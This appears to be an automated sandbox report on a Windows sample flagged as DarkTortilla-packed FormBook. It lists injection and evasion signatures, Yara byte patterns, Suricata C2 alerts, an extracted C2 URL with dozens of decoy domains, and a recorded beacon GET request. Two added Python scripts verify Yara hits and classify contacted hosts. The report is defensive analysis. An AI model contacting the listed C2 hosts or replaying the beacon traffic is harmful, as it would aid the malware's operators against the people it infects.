Windows Analysis Report
VFylJFPzqX.exe

Overview

General Information

Sample name: VFylJFPzqX.exe (renamed because the original name is a hash value)
Original sample name: acb23b92beb1de31d7175c94f94854887bc0b2adb90faddc89bf1b14b1bd1a4b.exe
Analysis ID: 1524408
MD5: e9e768aa357a7e34348c69e41444964d
SHA1: 4930b85e20b7967cf0afb1d9ae9ae57ca4d373c9
SHA256: acb23b92beb1de31d7175c94f94854887bc0b2adb90faddc89bf1b14b1bd1a4b
Tags: 172-67-165-197, exe, user-JAMESWT_MHT

Detection

DarkTortilla, FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • VFylJFPzqX.exe (PID: 7764 cmdline: "C:\Users\user\Desktop\VFylJFPzqX.exe" MD5: E9E768AA357A7E34348C69E41444964D)
    • AddInProcess32.exe (PID: 7984 cmdline: "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cmmon32.exe (PID: 8104 cmdline: "C:\Windows\SysWOW64\cmmon32.exe" MD5: DEC326E5B4D23503EA5176878DDDB683)
          • cmd.exe (PID: 8148 cmdline: /c del "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • explorer.exe (PID: 3272 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
        • WerFault.exe (PID: 4124 cmdline: C:\Windows\system32\WerFault.exe -u -p 4084 -s 3228 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
Name: DarkTortilla
Description: DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging. From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Name: Formbook, Formbo
Description: FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
Attribution: SWEED, Cobalt
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
{"C2 list": ["www.freakyressop.xyz/igbn/"], "decoy": ["daolangfans.com", "creatievecontentpeople.com", "cargizmos.net", "azure1224.xyz", "shopahava.com", "recursum.com", "rumblerain.com", "betmonde396.com", "webinarcerdaskanindonesia.com", "telemaca.com", "hellohurt.com", "peaceprairie.com", "johntheonlinearborist.com", "pilotbxprt.store", "creatingsobriety.com", "getrightspt.com", "104456.com", "travelsofwray.com", "americagroupperu.com", "silberscore.net", "history-poker.site", "readypacks.com", "shillay-live.com", "dx-plastic.com", "fargrerike.com", "s5agents.com", "heatherbbmoore.com", "bangunrumahkreasi.com", "noticeupluy.com", "monicadenis.com", "cothmtest.com", "broomventures.tech", "livewey.net", "df9aztgr1r8i3f.life", "dxttkk.xyz", "musiclessonsandmore.com", "prolongdogslife.com", "gbraises.com", "rusticramble.online", "wellumatheraphy.com", "0658585.com", "nftcopyrights.xyz", "progresivetrade.co", "enet-insaat.com", "validationsystems.online", "mckinleyint.com", "ryanfabius.com", "madhikpahi.website", "readthearchitecture.com", "southforkranchliving.com", "linku-trans.com", "mlharquitectura.com", "brasilbikeshopsc.com", "disneychannelmusicstore.com", "sparksbeauteinc.com", "zmjob.net", "adakis.net", "mouldeddoorsupplier.com", "itk.world", "macherie-kumamoto.com", "123-tecnicos.com", "zalogneked.com", "fliptrade.cfd", "beyoncaeurope.com"]}
Source | Rule | Description | Author
00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  Strings:
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x18819:$sqlite3step: 68 34 1C 7B E1
  • 0x1892c:$sqlite3step: 68 34 1C 7B E1
  • 0x18848:$sqlite3text: 68 38 2A 90 C5
  • 0x1896d:$sqlite3text: 68 38 2A 90 C5
  • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
(40 further rule matches are not shown in this rendering)
Source | Rule | Description | Author
3.2.AddInProcess32.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.AddInProcess32.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
3.2.AddInProcess32.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  Strings:
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
3.2.AddInProcess32.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.AddInProcess32.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x18819:$sqlite3step: 68 34 1C 7B E1
  • 0x1892c:$sqlite3step: 68 34 1C 7B E1
  • 0x18848:$sqlite3text: 68 38 2A 90 C5
  • 0x1896d:$sqlite3text: 68 38 2A 90 C5
  • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
(9 further rule matches are not shown in this rendering)
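The two Yara tables above (the memory dump and the unpacked PE) list the same strings at the same offsets, which is what you expect when the "unpacked" artifact is the same image the rule hit in memory. The script below is an added example, not Joe Sandbox or rule-author code, for re-checking those hits yourself: it parses rows in the report's "offset:$name: bytes" form, supports Yara "??" wildcards, confirms that each pattern really sits at its reported offset, and decodes the 5-byte JPCERT strings, which are x86 `push imm32` instructions (opcode 0x68 followed by a little-endian constant; the rule's string names suggest the constants are the hashed names of the sqlite3 functions FormBook resolves at runtime, which is the rule author's reading, not something the report states). The scanned image is constructed from the rows so the script runs offline; point verify_file() at the real 3.2.AddInProcess32.exe.400000.0.raw.unpack to check an actual dump.

```python
"""Re-check Yara string hits from the report against a memory image.

Added example, not Joe Sandbox or rule-author code. REPORT_ROWS copies rows
from the report's Yara "Strings" column; the image built by build_image() is
constructed from those rows (zeros elsewhere) so everything runs offline.
"""
import re
import struct
from typing import Dict, List, Optional, Tuple

HexPattern = List[Optional[int]]    # None = Yara "??" wildcard byte

# Rows copied from the report (offset:$name: bytes).
REPORT_ROWS = """
0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
0x18819:$sqlite3step: 68 34 1C 7B E1
0x1892c:$sqlite3step: 68 34 1C 7B E1
0x18848:$sqlite3text: 68 38 2A 90 C5
0x1885b:$sqlite3blob: 68 53 D8 7F 8C
"""

ROW_RE = re.compile(
    r"^(0x[0-9a-f]+):\$(\w+):\s*((?:[0-9a-f]{2}|\?\?)(?:\s+(?:[0-9a-f]{2}|\?\?))*)$",
    re.IGNORECASE,
)


def parse_hex(text: str) -> HexPattern:
    """'68 ?? 1C 7B E1' -> [0x68, None, 0x1C, 0x7B, 0xE1]."""
    return [None if tok == "??" else int(tok, 16) for tok in text.split()]


def parse_rows(text: str) -> List[Tuple[int, str, HexPattern]]:
    rows = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            raise ValueError(f"unparseable row: {line!r}")
        rows.append((int(m.group(1), 16), m.group(2), parse_hex(m.group(3))))
    return rows


def matches_at(buf: bytes, off: int, pat: HexPattern) -> bool:
    if off < 0 or off + len(pat) > len(buf):
        return False
    return all(p is None or buf[off + i] == p for i, p in enumerate(pat))


def find_all(buf: bytes, pat: HexPattern) -> List[int]:
    """Every offset where pat (with ?? wildcards) occurs in buf."""
    if pat and pat[0] is not None:          # fast path: seek the first concrete byte
        hits, i = [], buf.find(bytes([pat[0]]))
        while i != -1:
            if matches_at(buf, i, pat):
                hits.append(i)
            i = buf.find(bytes([pat[0]]), i + 1)
        return hits
    return [i for i in range(len(buf) - len(pat) + 1) if matches_at(buf, i, pat)]


def build_image(rows: List[Tuple[int, str, HexPattern]], pad: int = 16) -> bytes:
    """Constructed image: the reported bytes at the reported offsets, zeros elsewhere."""
    img = bytearray(max(off + len(pat) for off, _, pat in rows) + pad)
    for off, _, pat in rows:
        for i, p in enumerate(pat):
            if p is not None:
                img[off + i] = p
    return bytes(img)


def verify(buf: bytes, rows: List[Tuple[int, str, HexPattern]]) -> Dict[str, bool]:
    """'name@offset' -> True when the reported bytes really sit at that offset."""
    return {f"{name}@{off:#x}": matches_at(buf, off, pat) for off, name, pat in rows}


def verify_file(path: str, rows: List[Tuple[int, str, HexPattern]]) -> Dict[str, bool]:
    with open(path, "rb") as f:
        return verify(f.read(), rows)


def push_imm32(pat: HexPattern) -> int:
    """Decode a 5-byte x86 `push imm32` (opcode 0x68), the shape of the JPCERT strings."""
    if len(pat) != 5 or pat[0] != 0x68 or any(p is None for p in pat):
        raise ValueError("not a concrete push imm32 encoding")
    return struct.unpack("<I", bytes(pat[1:]))[0]


if __name__ == "__main__":
    rows = parse_rows(REPORT_ROWS)
    image = build_image(rows)
    for key, ok in verify(image, rows).items():
        print(f"{key}: {'ok' if ok else 'MISSING'}")
    print(f"$sqlite3step pushes {push_imm32(parse_hex('68 34 1C 7B E1')):#010x}")
```

Offsets in the table are relative to the start of the dumped region (image base 0x400000 for this dump), so verify_file() on the raw unpack needs no rebasing; if you instead carve the region from a full process dump, subtract the region's start address first.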
          No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-02T18:58:51.666674+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49714 | 34.149.87.45 | 80 | TCP
2024-10-02T19:00:00.938230+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49737 | 191.252.4.20 | 80 | TCP


          AV Detection

Source: VFylJFPzqX.exe | Avira: detected
Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.freakyressop.xyz/igbn/"], "decoy": ["daolangfans.com", "creatievecontentpeople.com", "cargizmos.net", "azure1224.xyz", "shopahava.com", "recursum.com", "rumblerain.com", "betmonde396.com", "webinarcerdaskanindonesia.com", "telemaca.com", "hellohurt.com", "peaceprairie.com", "johntheonlinearborist.com", "pilotbxprt.store", "creatingsobriety.com", "getrightspt.com", "104456.com", "travelsofwray.com", "americagroupperu.com", "silberscore.net", "history-poker.site", "readypacks.com", "shillay-live.com", "dx-plastic.com", "fargrerike.com", "s5agents.com", "heatherbbmoore.com", "bangunrumahkreasi.com", "noticeupluy.com", "monicadenis.com", "cothmtest.com", "broomventures.tech", "livewey.net", "df9aztgr1r8i3f.life", "dxttkk.xyz", "musiclessonsandmore.com", "prolongdogslife.com", "gbraises.com", "rusticramble.online", "wellumatheraphy.com", "0658585.com", "nftcopyrights.xyz", "progresivetrade.co", "enet-insaat.com", "validationsystems.online", "mckinleyint.com", "ryanfabius.com", "madhikpahi.website", "readthearchitecture.com", "southforkranchliving.com", "linku-trans.com", "mlharquitectura.com", "brasilbikeshopsc.com", "disneychannelmusicstore.com", "sparksbeauteinc.com", "zmjob.net", "adakis.net", "mouldeddoorsupplier.com", "itk.world", "macherie-kumamoto.com", "123-tecnicos.com", "zalogneked.com", "fliptrade.cfd", "beyoncaeurope.com"]}
Source: VFylJFPzqX.exe | ReversingLabs: Detection: 73%
Source: Yara match | File source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: VFylJFPzqX.exe | Joe Sandbox ML: detected
Source: VFylJFPzqX.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: AddInProcess32.pdb | source: AddInProcess32.exe, 00000003.00000000.1427689911.0000000000CC2000.00000002.00000001.01000000.0000000C.sdmp, explorer.exe, 00000004.00000002.2373426103.00000000106CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2664288495.0000000002678000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2669741591.000000000489F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000010.00000002.2679117867.000000000A6FF000.00000004.80000000.00040000.00000000.sdmp, AddInProcess32.exe.0.dr
Source: Binary string: cmmon32.pdb | source: AddInProcess32.exe, 00000003.00000002.1519369707.0000000001338000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000003.00000002.1519293726.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000005.00000002.2660330893.00000000001F0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL | source: AddInProcess32.exe, 00000003.00000002.1519369707.0000000001338000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000003.00000002.1519293726.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2660330893.00000000001F0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: AddInProcess32.exe, 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2668080386.0000000004350000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2668080386.00000000044EE000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.1519005091.0000000003FFE000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.1520648011.00000000041A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: AddInProcess32.exe, AddInProcess32.exe, 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000005.00000002.2668080386.0000000004350000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2668080386.00000000044EE000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.1519005091.0000000003FFE000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.1520648011.00000000041A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AddInProcess32.pdbpw | source: AddInProcess32.exe, 00000003.00000000.1427689911.0000000000CC2000.00000002.00000001.01000000.0000000C.sdmp, explorer.exe, 00000004.00000002.2373426103.00000000106CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2664288495.0000000002678000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2669741591.000000000489F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000010.00000002.2679117867.000000000A6FF000.00000004.80000000.00040000.00000000.sdmp, AddInProcess32.exe.0.dr
Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Code function: 4x nop then jmp 00C38F0Dh | 0_2_00C389A8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 4x nop then pop ebx | 3_2_00407B1A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 4x nop then pop edi | 3_2_00416C92
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4x nop then pop ebx | 5_2_02497B1C
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4x nop then pop edi | 5_2_024A6C92

          Networking

Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49714 -> 34.149.87.45:80
Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49714 -> 34.149.87.45:80
Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49714 -> 34.149.87.45:80
Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49737 -> 191.252.4.20:80
Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49737 -> 191.252.4.20:80
Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49737 -> 191.252.4.20:80
Source: Malware configuration extractor | URLs: www.freakyressop.xyz/igbn/
Source: global traffic | HTTP traffic detected: GET /igbn/?kDKH=K36gPXxmOtT7ZhgLXiyek6cbIzcBFal5uRZotzE1UqqTN+uoUurMQ0X06uvOZOdqSzHy&Rl=YTFLi4d0T2 HTTP/1.1 | Host: www.mlharquitectura.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 34.149.87.45
Source: Joe Sandbox View | IP Address: 34.149.87.45
Source: Joe Sandbox View | ASN Name: ATGS-MMD-ASUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (6 occurrences)
Source: C:\Windows\explorer.exe | Code function: 4_2_10F75F82 getaddrinfo,setsockopt,recv, | 4_2_10F75F82
Source: global traffic | HTTP traffic detected: GET /igbn/?kDKH=K36gPXxmOtT7ZhgLXiyek6cbIzcBFal5uRZotzE1UqqTN+uoUurMQ0X06uvOZOdqSzHy&Rl=YTFLi4d0T2 HTTP/1.1 | Host: www.mlharquitectura.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | DNS traffic detected: DNS query: www.creatievecontentpeople.com
Source: global traffic | DNS traffic detected: DNS query: www.mlharquitectura.com
Source: global traffic | DNS traffic detected: DNS query: www.cargizmos.net
Source: global traffic | DNS traffic detected: DNS query: api.msn.com
Source: global traffic | DNS traffic detected: DNS query: www.history-poker.site
Source: global traffic | DNS traffic detected: DNS query: www.brasilbikeshopsc.com
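Every host queried during the run except api.msn.com is in the "decoy" list of the extracted configuration, and the single configured C2 (www.freakyressop.xyz) was not contacted in the capture window; the GET that triggered the Suricata alerts went to one of those decoys, with no User-Agent and seven NUL bytes of body. The script below is an added example, not Joe Sandbox or Suricata logic (the ET rules 2031412/2031449/2031453 have their own conditions, which this does not reproduce), showing how to use the extracted configuration the way a responder would: map every observed name to c2, decoy or unrelated, and score an HTTP request for the check-in shape seen here. CONFIG_JSON is a subset of the report's configuration, DNS_QUERIES copies the DNS rows above, and HTTP_REQUEST is the recorded GET re-assembled with CRLF line endings; all three are constructed inputs, and the heuristics in checkin_indicators() are drawn from this one capture rather than from any published rule.

```python
"""Classify contacted hosts against the extracted FormBook configuration and
score a request for the check-in shape recorded in this analysis.

Added example, not Joe Sandbox or Suricata code. All inputs are constructed
from the report (configuration subset, DNS rows, the one GET request).
"""
import json
from typing import Dict, List, Set
from urllib.parse import parse_qsl, urlsplit

# Subset of the report's extracted configuration (same key names as the report).
CONFIG_JSON = (
    '{"C2 list": ["www.freakyressop.xyz/igbn/"], '
    '"decoy": ["creatievecontentpeople.com", "cargizmos.net", "mlharquitectura.com", '
    '"history-poker.site", "brasilbikeshopsc.com", "azure1224.xyz", "123-tecnicos.com"]}'
)

# DNS names queried during the run, as listed in the Networking section.
DNS_QUERIES = [
    "www.creatievecontentpeople.com", "www.mlharquitectura.com", "www.cargizmos.net",
    "api.msn.com", "www.history-poker.site", "www.brasilbikeshopsc.com",
]

# The recorded GET, re-assembled with CRLF line endings; the report shows the
# headers run together and a body of seven NUL bytes ("Data Raw").
HTTP_REQUEST = (
    "GET /igbn/?kDKH=K36gPXxmOtT7ZhgLXiyek6cbIzcBFal5uRZotzE1UqqTN+uoUurMQ0X06uvOZOdqSzHy"
    "&Rl=YTFLi4d0T2 HTTP/1.1\r\n"
    "Host: www.mlharquitectura.com\r\n"
    "Connection: close\r\n"
    "\r\n" + "\x00" * 7
)


def norm_host(host: str) -> str:
    """Lower-case, strip a trailing dot and a leading 'www.' so config and DNS compare."""
    h = host.strip().lower().rstrip(".")
    return h[4:] if h.startswith("www.") else h


def load_config(text: str) -> Dict[str, Set[str]]:
    cfg = json.loads(text)
    c2_hosts, c2_paths = set(), set()
    for entry in cfg["C2 list"]:
        u = urlsplit("http://" + entry)      # config entries carry no scheme
        c2_hosts.add(norm_host(u.hostname or ""))
        c2_paths.add(u.path)
    return {"c2": c2_hosts, "paths": c2_paths, "decoy": {norm_host(d) for d in cfg["decoy"]}}


def classify_host(host: str, cfg: Dict[str, Set[str]]) -> str:
    h = norm_host(host)
    if h in cfg["c2"]:
        return "c2"
    if h in cfg["decoy"]:
        return "decoy"
    return "unrelated"


def summarize_dns(queries: List[str], cfg: Dict[str, Set[str]]) -> Dict[str, List[str]]:
    out: Dict[str, List[str]] = {"c2": [], "decoy": [], "unrelated": []}
    for q in queries:
        out[classify_host(q, cfg)].append(q)
    return out


def parse_request(raw: str) -> Dict[str, object]:
    """Minimal HTTP/1.1 request parser: request line, headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    u = urlsplit(target)
    return {"method": method, "path": u.path,
            "params": parse_qsl(u.query, keep_blank_values=True),
            "headers": headers, "body": body}


def checkin_indicators(req: Dict[str, object], cfg: Dict[str, Set[str]]) -> List[str]:
    """Heuristics from this capture; each is weak alone, together they are the beacon."""
    reasons = []
    kind = classify_host(req["headers"].get("host", ""), cfg)
    if kind != "unrelated":
        reasons.append(f"Host is a configured {kind} domain")
    if req["method"] == "GET" and req["path"] in cfg["paths"]:
        reasons.append("path equals the configured C2 path")
    if len(req["params"]) == 2:
        reasons.append("two query parameters, as in the recorded beacon")
    if "user-agent" not in req["headers"]:
        reasons.append("no User-Agent header")
    if req["method"] == "GET" and req["body"]:
        reasons.append("GET carries a body")
    return reasons


if __name__ == "__main__":
    cfg = load_config(CONFIG_JSON)
    print(summarize_dns(DNS_QUERIES, cfg))
    print(checkin_indicators(parse_request(HTTP_REQUEST), cfg))
```

The point of the decoy classification is triage: FormBook rotates through the decoy domains and the real C2, so blocking only the hosts seen in a single sandbox run misses the C2 entirely, while the configured path (/igbn/) and the request shape stay constant across all of them.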
Strings found in binary or memory (explorer.exe), grouped by the memory dumps they were found in:

